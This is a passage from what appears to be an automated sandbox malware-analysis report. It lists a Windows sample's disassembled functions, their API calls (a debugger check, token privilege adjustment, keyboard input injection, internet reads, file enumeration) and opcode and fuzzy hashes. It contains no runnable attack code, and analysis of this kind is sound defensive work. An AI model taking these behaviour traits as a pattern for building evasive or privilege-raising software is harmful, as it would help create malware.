                                                      • Instruction Fuzzy Hash: 9B312A30A40208AFFF348B698C05BFA77A6AF44314F1C623AF585721D1E7758985C7D2
                                                      Function 00EACE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00EACE89
                                                      • GetLastError.KERNEL32(?,00000000), ref: 00EACEEA
                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 00EACEFE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorEventFileInternetLastRead
                                                      • String ID:
                                                      • API String ID: 234945975-0
                                                      • Opcode ID: b75f06ebc5e69a54b1e69227ed4d0a35864c1d85ff6bbd39ad29a30312532e64
                                                      • Instruction ID: 563d51b798ad23e324265a80d8321132212c3f3e80e54d7b6ef6559dba75485d
                                                      • Opcode Fuzzy Hash: b75f06ebc5e69a54b1e69227ed4d0a35864c1d85ff6bbd39ad29a30312532e64
                                                      • Instruction Fuzzy Hash: 1F21BD75600705AFEB20CF65C948BA677F8EB05358F20982EE646B6151E770FE09CB90
                                                      Function 00EA5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00EA5CC1
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00EA5D17
                                                      • FindClose.KERNEL32(?), ref: 00EA5D5F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: 743eae2a9e55a42a92f04f0016dac88d91f214a34f88676ab57d40a26173b296
                                                      • Instruction ID: e5735a5ffe8812f3d2844156dc3928f2dd14b722690805762ca581e99f9da071
                                                      • Opcode Fuzzy Hash: 743eae2a9e55a42a92f04f0016dac88d91f214a34f88676ab57d40a26173b296
                                                      • Instruction Fuzzy Hash: BF518A75604A019FC714CF28C498E96BBE4FF4A324F14955DE99AAB3A1CB30F905CF91
                                                      Function 00E62622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32 ref: 00E6271A
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E62724
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00E62731
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: 81daa1be27fd1bb93a5c735745b89ff0b6b918ce6f61bc485608805c250ba65b
                                                      • Instruction ID: d32081bf2d5c497b955aec752d387f5b7f7b2498b8dd99bc7285aab0c9930160
                                                      • Opcode Fuzzy Hash: 81daa1be27fd1bb93a5c735745b89ff0b6b918ce6f61bc485608805c250ba65b
                                                      • Instruction Fuzzy Hash: 1131C274D4121CABCB21DF68DC88B9CBBB8AF08310F5051EAE91CA6261E7309F858F44
                                                      Function 00EA51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00EA51DA
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00EA5238
                                                      • SetErrorMode.KERNEL32(00000000), ref: 00EA52A1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID:
                                                      • API String ID: 1682464887-0
                                                      • Opcode ID: 24df6a3eae324ae343ac3ca797faa04d1ed07a9595ea35cd2cee836a58647abb
                                                      • Instruction ID: 443b5a7e9e439f32000d24b36a9559417f21d38d60591538de270755b7046816
                                                      • Opcode Fuzzy Hash: 24df6a3eae324ae343ac3ca797faa04d1ed07a9595ea35cd2cee836a58647abb
                                                      • Instruction Fuzzy Hash: BC312D75A00518DFDB00DF55D888EADBBF5FF49318F189099E805AB362DB31E856CBA0
                                                      Function 00E916C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E4FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00E50668
                                                        • Part of subcall function 00E4FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00E50685
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E9170D
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E9173A
                                                      • GetLastError.KERNEL32 ref: 00E9174A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                      • String ID:
                                                      • API String ID: 577356006-0
                                                      • Opcode ID: 42e4b7d2ea52b13fe444285b2ee71a31f5a3c9453d9b776680c150eee6b6fa9b
                                                      • Instruction ID: 333e20e9674104f3781f338b15352365df713a93c8a3b1df54e1ceedaf7ef8de
                                                      • Opcode Fuzzy Hash: 42e4b7d2ea52b13fe444285b2ee71a31f5a3c9453d9b776680c150eee6b6fa9b
                                                      • Instruction Fuzzy Hash: 6E11C1B2800305AFE7189F54EC86E6AB7F9EF04B14B24856EE05663241EB70BC428A20
                                                      Function 00E9D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E9D608
                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00E9D645
                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E9D650
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                      • String ID:
                                                      • API String ID: 33631002-0
                                                      • Opcode ID: bb5d31935200aa51a969deb2516ca40f013e59a8dcd330bbce40ce2a1945704d
                                                      • Instruction ID: 6dec14edddae778af463505e6faee279ac21b798a3e532fe84f41eaec5f50dc5
                                                      • Opcode Fuzzy Hash: bb5d31935200aa51a969deb2516ca40f013e59a8dcd330bbce40ce2a1945704d
                                                      • Instruction Fuzzy Hash: AF115EB5E05228BFDB108F99EC45FAFBBBCEB45B50F108165F908F7290D6704A058BA1
                                                      Function 00E91663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00E9168C
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E916A1
                                                      • FreeSid.ADVAPI32(?), ref: 00E916B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      • Opcode ID: e333af14bc5a24edeb3662f8f6dfc34ec6f50183314511e3214de84ec7cd04cd
                                                      • Instruction ID: cd40c0fd588b0030916f960c1936572deb200e81004d47497dd84e7cda5a0a2c
                                                      • Opcode Fuzzy Hash: e333af14bc5a24edeb3662f8f6dfc34ec6f50183314511e3214de84ec7cd04cd
                                                      • Instruction Fuzzy Hash: 64F04471940309FFDF00CFE08C8AEAEBBBCFB08204F1044A1E900E2181E331AA088A54
                                                      Function 00E6C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /
                                                      • API String ID: 0-2043925204
                                                      • Opcode ID: 3c1e541af4b398501acd9fd29dece0799bca67dd8825652c69b0dddfac3bdf0e
                                                      • Instruction ID: ea0da00db158db34c2791c98ae9d1ba615b6da95ab1316d0f281d99632d378e8
                                                      • Opcode Fuzzy Hash: 3c1e541af4b398501acd9fd29dece0799bca67dd8825652c69b0dddfac3bdf0e
                                                      • Instruction Fuzzy Hash: FC415C725806196FCB20DFB9EC48DBB77B8EB84398F2051ADF955E7280E6309D41CB50
                                                      Function 00E8D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00E8D28C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID: X64
                                                      • API String ID: 2645101109-893830106
                                                      • Opcode ID: c84acdd286e0a0b5b921e4496ee55e87de7f9d6b8e2f76f750126c523d805e03
                                                      • Instruction ID: aa8e49ca5e39078adde7b06e5836aeebda7af5ecfec7742c9a6b3daa3d4b564d
                                                      • Opcode Fuzzy Hash: c84acdd286e0a0b5b921e4496ee55e87de7f9d6b8e2f76f750126c523d805e03
                                                      • Instruction Fuzzy Hash: 42D0C9B480511DEECB90DB90EC88DD9B37CBB04305F100151F10AB2040D73095498F10
                                                      Function 00E5CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                      • Instruction ID: c1874d658ac0d9dda6a11af30a53103bd3aeeb56b094e744fbb2cb89c122bb9b
                                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                      • Instruction Fuzzy Hash: F1022A71E002199FDF14CFA9C8906ADFBF1EF88315F25956AD919FB280D730AA45CB90
                                                      Function 00EA68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00EA6918
                                                      • FindClose.KERNEL32(00000000), ref: 00EA6961
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      • Opcode ID: c9261fea17f6c7135fb9e67db454e8387c08886c73915906ff223c1574c90e49
                                                      • Instruction ID: 4d6a9d943bbae09075352ae9a8de4f49d5850100d24b3758dc503bf54269b140
                                                      • Opcode Fuzzy Hash: c9261fea17f6c7135fb9e67db454e8387c08886c73915906ff223c1574c90e49
                                                      • Instruction Fuzzy Hash: DB1196756046009FC714DF29D488A16BBE5FF89328F18D599E4699F6A2C730EC05CB91
                                                      Function 00EA37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00EB4891,?,?,00000035,?), ref: 00EA37E4
                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00EB4891,?,?,00000035,?), ref: 00EA37F4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      • Opcode ID: 8219b42714a20f720b571707a6231584cdecc0be9baed9f2ef9ae3a5eedaee92
                                                      • Instruction ID: 3ce2a2a612ba7b796b8316b69c7545665f36f4ee7336243c4036a3d08943d25f
                                                      • Opcode Fuzzy Hash: 8219b42714a20f720b571707a6231584cdecc0be9baed9f2ef9ae3a5eedaee92
                                                      • Instruction Fuzzy Hash: FCF0EC717043142AD71057765C4DFDB7A9DEFC5761F100176F509F2291D5605905C6B0
                                                      Function 00E9B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00E9B25D
                                                      • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00E9B270
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: InputSendkeybd_event
                                                      • String ID:
                                                      • API String ID: 3536248340-0
                                                      • Opcode ID: 9677cb9c6b4d39f5624fc2ec1a485d6f020e75a62e12f6229225be5d5a8f6fcf
                                                      • Instruction ID: 70b1f92d5c16ae632ec111b91ab624861ba192529eb2f60f905e7abd251c2950
                                                      • Opcode Fuzzy Hash: 9677cb9c6b4d39f5624fc2ec1a485d6f020e75a62e12f6229225be5d5a8f6fcf
                                                      • Instruction Fuzzy Hash: F6F01D7180424DAFDF059FA1D805BEE7BB4FF08309F10901AF955A51A1C37996169F94
                                                      Function 00E910BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E911FC), ref: 00E910D4
                                                      • CloseHandle.KERNEL32(?,?,00E911FC), ref: 00E910E9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                      • String ID:
                                                      • API String ID: 81990902-0
                                                      • Opcode ID: 790a223330e44a1c9b8bd65e69cb37b5116f0476566d604e5041b2514ac58979
                                                      • Instruction ID: 0e021b50cd15a5cecac510ff610930b6faf440c3b47f4003123937ff3ceb92b6
                                                      • Opcode Fuzzy Hash: 790a223330e44a1c9b8bd65e69cb37b5116f0476566d604e5041b2514ac58979
                                                      • Instruction Fuzzy Hash: 7CE04F32008600AEE7252B11FC05E7777E9EB04720F24882DF4A6904B1DB636C91DB10
                                                      Function 00E3CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Variable is not of type 'Object'., xrefs: 00E80C40
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Variable is not of type 'Object'.
                                                      • API String ID: 0-1840281001
                                                      • Opcode ID: 4412c63ebf048d18f12c040ff3873885787eb7d7b248d111fdb7257346725490
                                                      • Instruction ID: a5d9306785590095d1f1e765a5a26687c89a38ae72f8fbd74f8ab809f126f5df
                                                      • Opcode Fuzzy Hash: 4412c63ebf048d18f12c040ff3873885787eb7d7b248d111fdb7257346725490
                                                      • Instruction Fuzzy Hash: 29329F74900218DBCF14EF94D889AEDBBF5BF04308F646069E80ABB292D775ED49CB51
                                                      Function 00E6676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00E66766,?,?,00000008,?,?,00E6FEFE,00000000), ref: 00E66998
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      • Opcode ID: 3bf1ae17a7caa4ff370419d964f9700d5600c62c5d5990520873bcf5bf24afe7
                                                      • Instruction ID: 73be308a30880355c202bf621fba3bf9fb8c0ae563fe4c9f584a78706b703531
                                                      • Opcode Fuzzy Hash: 3bf1ae17a7caa4ff370419d964f9700d5600c62c5d5990520873bcf5bf24afe7
                                                      • Instruction Fuzzy Hash: 26B16E31560608DFD719CF28D48ABA57BE0FF453A8F259658E899DF2A2C335E981CB40
                                                      Function 00E4B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 008cb27450e38e22f15055814f30c7fdf815a270e42096c219761e6771469a12
                                                      • Instruction ID: 05d00074234ecc99f76f7fb8fa24fa5129eee8d9e749c06751cf2dea042da927
                                                      • Opcode Fuzzy Hash: 008cb27450e38e22f15055814f30c7fdf815a270e42096c219761e6771469a12
                                                      • Instruction Fuzzy Hash: D2125F719002299FCB24DF58D9806EEB7F5FF48710F5491AAE849FB251EB709E81CB90
                                                      Function 00EAEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
